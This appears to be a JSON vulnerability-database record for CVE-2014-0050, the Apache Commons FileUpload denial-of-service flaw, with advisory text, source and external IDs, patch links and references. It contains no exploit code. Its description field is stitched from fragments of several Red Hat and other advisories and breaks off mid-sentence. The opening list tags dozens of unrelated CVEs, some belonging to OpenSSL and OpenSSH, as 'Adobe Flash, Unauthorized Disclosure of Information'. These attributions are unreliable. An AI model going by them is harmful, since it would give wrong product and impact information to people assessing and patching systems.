Disclosure of Information\n  - CVE-2015-8438 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8439 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8440 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8441 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8442 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8443 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8444 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8445 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8446 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8447 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8448 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8449 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8450 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8451 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8452 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8453 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8454 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8455 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8456 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8457 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8459 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8460 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8634 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8635 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8636 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8638 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8639 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8640 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8641 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8642 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8643 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8644 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8645 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8646 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8647 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8648 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8649 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8650 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2015-8651 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-0702 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-0705 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-0777 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-0778 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-0797 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-0799 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-1521 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-1907 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-2105 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-2106 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-2107 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-2109 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-2183 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-2842 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-3739 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4070 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4071 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4072 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4342 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4343 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4393 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4394 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4395 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4396 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4537 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4538 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4539 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4540 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4541 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4542 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-4543 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-5385 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-5387 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2016-5388 - Adobe Flash, Unauthorized Disclosure of Information\n  - CVE-2017-5787 - DoS - LINUX VCRM\n  - CVE-2016-8517 - SIM\n  - CVE-2016-8516 - SIM\n  - CVE-2016-8518 - SIM\n  - CVE-2016-8513 - Cross-Site Request Forgery (CSRF) Linux VCRM\n  - CVE-2016-8515 - Malicious File Upload - Linux VCRM\n  - CVE-2016-8514 - Information Disclosure - Linux VCRM\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Description:\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library. \n\nIt was found that when Tomcat processed a series of HTTP requests in which\nat least one request contained either multiple content-length headers, or\none content-length header with a chunked transfer-encoding header, Tomcat\nwould incorrectly handle the request. (CVE-2013-4286)\n\nIt was discovered that the fix for CVE-2012-3544 did not properly resolve a\ndenial of service flaw in the way Tomcat processed chunk extensions and\ntrailing headers in chunked requests. A remote attacker could use this flaw\nto send an excessively long request that, when processed by Tomcat, could\nconsume network bandwidth, CPU, and memory on the Tomcat server. Note that\nchunked transfer encoding is enabled by default. (CVE-2013-4322)\n\nIt was found that previous fixes in Tomcat 6 to path parameter handling\nintroduced a regression that caused Tomcat to not properly disable URL\nrewriting to track session IDs when the disableURLRewriting option was\nenabled. A man-in-the-middle attacker could potentially use this flaw to\nhijack a user\u0027s session. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied, and back up your existing Red\nHat JBoss Web Server installation (including all applications and\nconfiguration files). Bugs fixed (https://bugzilla.redhat.com/):\n\n1062337 - CVE-2014-0050 apache-commons-fileupload: denial of service due to too-small buffer size used by MultipartStream\n1069905 - CVE-2013-4322 tomcat: incomplete fix for CVE-2012-3544\n1069919 - CVE-2014-0033 tomcat: session fixation still possible with disableURLRewriting enabled\n1069921 - CVE-2013-4286 tomcat: multiple content-length header poisoning flaws\n\n6.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Moderate: Red Hat JBoss Fuse 6.1.0 update\nAdvisory ID:       RHSA-2014:0400-03\nProduct:           Red Hat JBoss Fuse\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2014-0400.html\nIssue date:        2014-04-14\nCVE Names:         CVE-2013-2035 CVE-2013-2172 CVE-2013-2192 \n                   CVE-2013-4152 CVE-2013-4517 CVE-2013-6429 \n                   CVE-2013-6430 CVE-2014-0050 CVE-2014-0054 \n                   CVE-2014-0085 CVE-2014-1904 \n=====================================================================\n\n1. Summary:\n\nRed Hat JBoss Fuse 6.1.0, which fixes multiple security issues, several\nbugs, and adds various enhancements, is now available from the Red Hat\nCustomer Portal. \n\nThe Red Hat Security Response Team has rated this update as having\nModerate security impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section. \n\nRed Hat JBoss Fuse 6.1.0 is a minor product release that updates Red Hat\nJBoss Fuse 6.0.0, and includes several bug fixes and enhancements. Refer to\nthe Release Notes document, available from the link in the References\nsection, for a list of changes. \n\n2. Description:\n\nRed Hat JBoss Fuse, based on Apache ServiceMix, provides a small-footprint,\nflexible, open source enterprise service bus and integration platform. \n\nSecurity fixes:\n\nA flaw was found in the way Apache Santuario XML Security for Java\nvalidated XML signatures. Santuario allowed a signature to specify an\narbitrary canonicalization algorithm, which would be applied to the\nSignedInfo XML fragment. A remote attacker could exploit this to spoof an\nXML signature via a specially crafted XML signature block. (CVE-2013-2172)\n\nA flaw was found in the Apache Hadoop RPC protocol. A man-in-the-middle\nattacker could possibly use this flaw to unilaterally disable bidirectional\nauthentication between a client and a server, forcing a downgrade to simple\n(unidirectional) authentication. This flaw only affected users who have\nenabled Hadoop\u0027s Kerberos security features. (CVE-2013-2192)\n\nIt was discovered that the Spring OXM wrapper did not expose any property\nfor disabling entity resolution when using the JAXB unmarshaller. A remote\nattacker could use this flaw to conduct XML External Entity (XXE) attacks\non web sites, and read files in the context of the user running the\napplication server. (CVE-2013-4152)\n\nIt was discovered that the Apache Santuario XML Security for Java project\nallowed Document Type Definitions (DTDs) to be processed when applying\nTransforms even when secure validation was enabled. A remote attacker could\nuse this flaw to exhaust all available memory on the system, causing a\ndenial of service. (CVE-2013-4517)\n\nIt was found that the Spring MVC SourceHttpMessageConverter enabled entity\nresolution by default. A remote attacker could use this flaw to conduct XXE\nattacks on web sites, and read files in the context of the user running the\napplication server. (CVE-2013-6429)\n\nThe Spring JavaScript escape method insufficiently escaped some characters. \nApplications using this method to escape user-supplied content, which would\nbe rendered in HTML5 documents, could be exposed to cross-site scripting\n(XSS) flaws. (CVE-2013-6430)\n\nA denial of service flaw was found in the way Apache Commons FileUpload\nhandled small-sized buffers used by MultipartStream. (CVE-2014-0050)\n\nIt was found that fixes for the CVE-2013-4152 and CVE-2013-6429 XXE issues\nin Spring were incomplete. Spring MVC processed user-provided XML and\nneither disabled XML external entities nor provided an option to disable\nthem, possibly allowing a remote attacker to conduct XXE attacks. \n(CVE-2014-0054)\n\nA cross-site scripting (XSS) flaw was found in the Spring Framework when\nusing Spring MVC. When the action was not specified in a Spring form, the\naction field would be populated with the requested URI, allowing an\nattacker to inject malicious content into the form. (CVE-2014-1904)\n\nThe HawtJNI Library class wrote native libraries to a predictable file name\nin /tmp when the native libraries were bundled in a JAR file, and no custom\nlibrary path was specified. A local attacker could overwrite these native\nlibraries with malicious versions during the window between when HawtJNI\nwrites them and when they are executed. (CVE-2013-2035)\n\nAn information disclosure flaw was found in the way Apache Zookeeper stored\nthe password of an administrative user in the log files. A local user with\naccess to these log files could use the exposed sensitive information to\ngain administrative access to an application using Apache Zookeeper. \n(CVE-2014-0085)\n\nThe CVE-2013-6430 issue was discovered by Jon Passki of Coverity SRL and\nArun Neelicattu of the Red Hat Security Response Team, the CVE-2013-2035\nissue was discovered by Florian Weimer of the Red Hat Product Security\nTeam, and the CVE-2014-0085 issue was discovered by Graeme Colman of\nRed Hat. \n\n3. Solution:\n\nAll users of Red Hat JBoss Fuse 6.0.0 as provided from the Red Hat Customer\nPortal are advised to apply this update. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). \n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n958618 - CVE-2013-2035 HawtJNI: predictable temporary file name leading to local arbitrary code execution\n999263 - CVE-2013-2172 Apache Santuario XML Security for Java: XML signature spoofing\n1000186 - CVE-2013-4152 Spring Framework: XML External Entity (XXE) injection flaw\n1001326 - CVE-2013-2192 hadoop: man-in-the-middle vulnerability\n1039783 - CVE-2013-6430 Spring Framework: org.spring.web.util.JavaScriptUtils.javaScriptEscape insufficient escaping of characters\n1045257 - CVE-2013-4517 Apache Santuario XML Security for Java: Java XML Signature DoS Attack\n1053290 - CVE-2013-6429 Spring Framework: XML External Entity (XXE) injection flaw\n1062337 - CVE-2014-0050 apache-commons-fileupload: denial of service due to too-small buffer size used by MultipartStream\n1067265 - CVE-2014-0085 Apache Zookeeper: admin user cleartext password appears in logging\n1075296 - CVE-2014-1904 Spring Framework: cross-site scripting flaw when using Spring MVC\n1075328 - CVE-2014-0054 Spring Framework: incomplete fix for CVE-2013-4152/CVE-2013-6429\n\n5. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2013-2035.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2172.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2192.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-4152.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-4517.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-6429.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-6430.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0050.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0054.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0085.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-1904.html\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=jboss.fuse\u0026downloadType=distributions\u0026version=6.1.0\nhttps://access.redhat.com/site/documentation/en-US/Red_Hat_JBoss_Fuse/\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e.  More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFTS/JWXlSAg2UNWIIRAh+fAJ9677T5eyaDWJuYLiFlhdkjOhZncgCgwPG0\n4iA38miFgmWgRtUp0Xztb6E=\n=/1+z\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n \n Apache Tomcat 7.x before 7.0.50 allows attackers to obtain Tomcat\n internals information by leveraging the presence of an untrusted web\n application with a context.xml, web.xml, *.jspx, *.tagx, or *.tld XML\n document containing an external entity declaration in conjunction\n with an entity reference, related to an XML External Entity (XXE)\n issue (CVE-2013-4590).  The verification\n of md5 checksums and GPG signatures is performed automatically for you. JBoss Web Server provides\norganizations with a single deployment platform for Java Server Pages (JSP)\nand Java Servlet technologies, PHP, and CGI. It uses a genuine high\nperformance hybrid technology that incorporates the best of the most recent\nOS technologies for processing high volume data, while keeping all the\nreference Java specifications. \n\nApache Commons FileUpload package makes it easy to add robust,\nhigh-performance, file upload capability to servlets and web applications",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2014-0050"
          },
          {
            "db": "BID",
            "id": "65400"
          },
          {
            "db": "PACKETSTORM",
            "id": "125119"
          },
          {
            "db": "PACKETSTORM",
            "id": "129553"
          },
          {
            "db": "PACKETSTORM",
            "id": "128211"
          },
          {
            "db": "PACKETSTORM",
            "id": "139721"
          },
          {
            "db": "PACKETSTORM",
            "id": "126404"
          },
          {
            "db": "PACKETSTORM",
            "id": "126052"
          },
          {
            "db": "PACKETSTORM",
            "id": "140605"
          },
          {
            "db": "PACKETSTORM",
            "id": "127215"
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-0050"
          },
          {
            "db": "PACKETSTORM",
            "id": "125109"
          },
          {
            "db": "PACKETSTORM",
            "id": "125687"
          },
          {
            "db": "PACKETSTORM",
            "id": "141092"
          },
          {
            "db": "PACKETSTORM",
            "id": "126746"
          },
          {
            "db": "PACKETSTORM",
            "id": "126144"
          },
          {
            "db": "PACKETSTORM",
            "id": "131089"
          },
          {
            "db": "PACKETSTORM",
            "id": "126007"
          },
          {
            "db": "PACKETSTORM",
            "id": "126754"
          }
        ],
        "trust": 2.7
      },
      "exploit_availability": {
        "_id": null,
        "data": [
          {
            "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=31615",
            "trust": 0.1,
            "type": "exploit"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0050"
          }
        ]
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2014-0050",
            "trust": 3.0
          },
          {
            "db": "JVN",
            "id": "JVN14876762",
            "trust": 1.4
          },
          {
            "db": "HITACHI",
            "id": "HS14-015",
            "trust": 1.4
          },
          {
            "db": "HITACHI",
            "id": "HS14-017",
            "trust": 1.4
          },
          {
            "db": "HITACHI",
            "id": "HS14-016",
            "trust": 1.4
          },
          {
            "db": "BID",
            "id": "65400",
            "trust": 1.4
          },
          {
            "db": "PACKETSTORM",
            "id": "127215",
            "trust": 1.2
          },
          {
            "db": "SECUNIA",
            "id": "59232",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "59399",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "59185",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "59187",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "59039",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "59500",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "59184",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "60475",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "59041",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "59183",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "58075",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "58976",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "59492",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "59725",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "60753",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "57915",
            "trust": 1.1
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-000017",
            "trust": 1.1
          },
          {
            "db": "HITACHI",
            "id": "HS14-008",
            "trust": 0.3
          },
          {
            "db": "EXPLOIT-DB",
            "id": "31615",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-0050",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "126007",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "131089",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "126144",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "126746",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "141092",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "125687",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "125109",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "126754",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "125119",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "140605",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "126052",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "126404",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "139721",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "128211",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "129553",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0050"
          },
          {
            "db": "BID",
            "id": "65400"
          },
          {
            "db": "PACKETSTORM",
            "id": "126007"
          },
          {
            "db": "PACKETSTORM",
            "id": "131089"
          },
          {
            "db": "PACKETSTORM",
            "id": "126144"
          },
          {
            "db": "PACKETSTORM",
            "id": "126746"
          },
          {
            "db": "PACKETSTORM",
            "id": "141092"
          },
          {
            "db": "PACKETSTORM",
            "id": "125687"
          },
          {
            "db": "PACKETSTORM",
            "id": "125109"
          },
          {
            "db": "PACKETSTORM",
            "id": "126754"
          },
          {
            "db": "PACKETSTORM",
            "id": "125119"
          },
          {
            "db": "PACKETSTORM",
            "id": "127215"
          },
          {
            "db": "PACKETSTORM",
            "id": "140605"
          },
          {
            "db": "PACKETSTORM",
            "id": "126052"
          },
          {
            "db": "PACKETSTORM",
            "id": "126404"
          },
          {
            "db": "PACKETSTORM",
            "id": "139721"
          },
          {
            "db": "PACKETSTORM",
            "id": "128211"
          },
          {
            "db": "PACKETSTORM",
            "id": "129553"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0050"
          }
        ]
      },
      "id": "VAR-201404-0585",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.41471650857142855
      },
      "last_update_date": "2026-03-09T21:05:21.141000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "Debian Security Advisories: DSA-2856-1 libcommons-fileupload-java -- denial of service",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=642945afda91c20bf7efbc771575262b"
          },
          {
            "title": "Amazon Linux AMI: ALAS-2014-312",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2014-312"
          },
          {
            "title": "Ubuntu Security Notice: tomcat6, tomcat7 vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-2130-1"
          },
          {
            "title": "IBM: Security Bulletin: A vulnerability in Apache Commons Fileupload affects IBM Tivoli Business Service Manager (CVE-2013-2186,  CVE-2013-0248, CVE-2016-3092, CVE-2014-0050, 220723)",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=8bc75a85691b82e540dfdc9fe13fab57"
          },
          {
            "title": "Debian Security Advisories: DSA-2897-1 tomcat7 -- security update",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=2d279d06ad61c5b596d45790e28df427"
          },
          {
            "title": "Debian CVElist Bug Report Logs: tomcat7: CVE-2013-2071",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=94f2b1959436d579ea8b492b708008b8"
          },
          {
            "title": "Amazon Linux AMI: ALAS-2014-344",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2014-344"
          },
          {
            "title": "Symantec Security Advisories: SA100 : Apache Tomcat Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=94a4a81a426ea8a524a402abe366c375"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - April 2015",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4b527561ba1a5de7a529c8a93679f585"
          },
          {
            "title": "IBM: IBM Security Bulletin: IBM Security Privileged Identity Manager is affected by multiple security vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=8580d3cd770371e2ef0f68ca624b80b0"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - January 2016",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=63802a6c83b107c4e6e0c7f9241a66a8"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - October 2015",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=744c19dc9f4f70ad58059bf8733ec9c1"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - January 2015",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4a692d6d60aa31507cb101702b494c51"
          },
          {
            "title": "IBM: IBM Security Bulletin: IBM has announced a release for IBM Security Identity Governance and Intelligence in response to multiple security vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=55ea315dfb69fce8383762ac64250315"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c"
          },
          {
            "title": "",
            "trust": 0.1,
            "url": "https://github.com/Shiverino/NPE2223 "
          },
          {
            "title": "cve-2014-0050",
            "trust": 0.1,
            "url": "https://github.com/jrrdev/cve-2014-0050 "
          },
          {
            "title": "victims-version-search",
            "trust": 0.1,
            "url": "https://github.com/adedov/victims-version-search "
          },
          {
            "title": "-maven-security-versions",
            "trust": 0.1,
            "url": "https://github.com/nagauker/-maven-security-versions "
          },
          {
            "title": "maven-security-versions-Travis",
            "trust": 0.1,
            "url": "https://github.com/klee94/maven-security-versions-Travis "
          },
          {
            "title": "victims",
            "trust": 0.1,
            "url": "https://github.com/alexsh88/victims "
          },
          {
            "title": "victims",
            "trust": 0.1,
            "url": "https://github.com/tmpgit3000/victims "
          },
          {
            "title": "maven-security-versions",
            "trust": 0.1,
            "url": "https://github.com/victims/maven-security-versions "
          },
          {
            "title": "CDL",
            "trust": 0.1,
            "url": "https://github.com/NCSU-DANCE-Research-Group/CDL "
          },
          {
            "title": "Classified-Distributed-Learning-for-Detecting-Security-Attacks-in-Containerized-Applications",
            "trust": 0.1,
            "url": "https://github.com/yuhang-lin/Classified-Distributed-Learning-for-Detecting-Security-Attacks-in-Containerized-Applications "
          },
          {
            "title": "Threatpost",
            "trust": 0.1,
            "url": "https://threatpost.com/vmware-patches-apache-struts-flaws-in-vcops/106858/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0050"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "CWE-264",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2014-0050"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 1.6,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0050"
          },
          {
            "trust": 1.5,
            "url": "http://rhn.redhat.com/errata/rhsa-2014-0400.html"
          },
          {
            "trust": 1.4,
            "url": "http://jvn.jp/en/jp/jvn14876762/index.html"
          },
          {
            "trust": 1.4,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676410"
          },
          {
            "trust": 1.4,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676401"
          },
          {
            "trust": 1.4,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677724"
          },
          {
            "trust": 1.4,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675432"
          },
          {
            "trust": 1.4,
            "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-016/index.html"
          },
          {
            "trust": 1.4,
            "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-017/index.html"
          },
          {
            "trust": 1.4,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676403"
          },
          {
            "trust": 1.4,
            "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-015/index.html"
          },
          {
            "trust": 1.4,
            "url": "http://www.vmware.com/security/advisories/vmsa-2014-0007.html"
          },
          {
            "trust": 1.4,
            "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html"
          },
          {
            "trust": 1.4,
            "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html"
          },
          {
            "trust": 1.4,
            "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html"
          },
          {
            "trust": 1.4,
            "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html"
          },
          {
            "trust": 1.4,
            "url": "http://www.vmware.com/security/advisories/vmsa-2014-0008.html"
          },
          {
            "trust": 1.4,
            "url": "http://rhn.redhat.com/errata/rhsa-2014-0253.html"
          },
          {
            "trust": 1.4,
            "url": "http://rhn.redhat.com/errata/rhsa-2014-0252.html"
          },
          {
            "trust": 1.3,
            "url": "http://advisories.mageia.org/mgasa-2014-0110.html"
          },
          {
            "trust": 1.2,
            "url": "http://tomcat.apache.org/security-8.html"
          },
          {
            "trust": 1.2,
            "url": "http://svn.apache.org/r1565143"
          },
          {
            "trust": 1.2,
            "url": "http://tomcat.apache.org/security-7.html"
          },
          {
            "trust": 1.1,
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1062337"
          },
          {
            "trust": 1.1,
            "url": "http://jvndb.jvn.jp/jvndb/jvndb-2014-000017"
          },
          {
            "trust": 1.1,
            "url": "http://blog.spiderlabs.com/2014/02/cve-2014-0050-exploit-with-boundaries-loops-without-boundaries.html"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/57915"
          },
          {
